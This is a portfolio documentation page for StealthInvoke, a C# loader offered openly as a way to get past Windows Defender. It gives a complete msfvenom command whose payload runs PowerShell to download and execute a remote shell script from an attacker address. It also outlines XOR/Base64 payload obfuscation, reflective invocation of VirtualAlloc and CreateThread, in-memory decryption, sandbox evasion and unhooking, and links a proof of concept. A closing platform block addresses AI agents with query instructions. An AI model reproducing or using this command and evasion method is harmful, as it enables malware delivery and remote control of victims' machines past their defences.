> For the complete documentation index, see [llms.txt](https://gurpreet-portfolio.gitbook.io/gurpreet06/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gurpreet-portfolio.gitbook.io/gurpreet06/projects/stealthinvoke.md). # StealthInvoke StealthInvoke.exe is an application written in C#, capable of bypassing Windows Defender. It dynamically invokes the functions VirtualAlloc and CreateThread using the reflection module and decrypts a malicious payload in memory to bypass disk-based detection. ### Features * Remote Interactive shell * Dynamically Invoke functions like VirtualAlloc and CreateThread * Basic Sandbox Evasion ### How the script works: 1. Payload Generation: First, we generate a malicious payload using msfvenom. The command is as follows: ```python msfvenom --payload windows/exec CMD="cmd.exe /c powershell -c IEX(IWR http://10.X.X.X/shell.ps1 -UseBasicParsing);" EXITFUNC=thread -e x86/shikata_ga_nai -f csharp ``` 1. Payload Encryption: Next, we encrypt the generated payload using XOR and Base64 encoding. This step is crucial, as it obfuscates the payload, making it more challenging for antivirus programs like Windows Defender to detect the malicious code. 2. We apply the same encryption approach to the VirtualAlloc and CreateThread function names to obscure their use in the code. 3. Dynamic Invocation and Decryption: Finally, using the System.Reflection module, we dynamically invoke these functions. The encrypted payload is then decrypted directly in memory. ### Note: Advanced antivirus programs may have hooked functions like "VirtualAlloc" and "CreateThread." To execute our malicious payload, we first need to unhook them and then load our payload into memory. ### POC {% file src="/files/CCYJXou5eTwt4vTKgdDm" %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gurpreet-portfolio.gitbook.io/gurpreet06/projects/stealthinvoke.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.